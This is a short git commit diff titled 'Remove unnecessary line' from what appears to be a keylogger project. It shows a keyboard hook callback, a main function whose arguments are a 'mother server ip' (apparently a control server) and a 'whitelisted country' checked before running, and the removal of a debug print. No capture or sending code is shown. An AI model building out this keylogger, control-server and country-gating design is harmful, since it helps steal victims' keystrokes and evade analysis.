General: Remove unnecessary line

This commit is contained in:
osamu 2022-12-31 11:38:11 -08:00
parent 790582646f
commit 277f473d6d

View File

@ -65,15 +65,12 @@ LRESULT CALLBACK keyboard_callback(int nCode, WPARAM wParam, LPARAM lParam) {
} }
/* /*
ARGUMENTS: ARGUMENTS:
- 1: initial mother server ip - 1: initial mother server ip
- 2: whitelisted country - 2: whitelisted country
*/ */
int main(int argc, char** argv) { int main(int argc, char** argv) {
std::cout << "lmao" << std::endl;
// security Checks // security Checks
if (!check_country(argv[2])) if (!check_country(argv[2]))
return 0; return 0;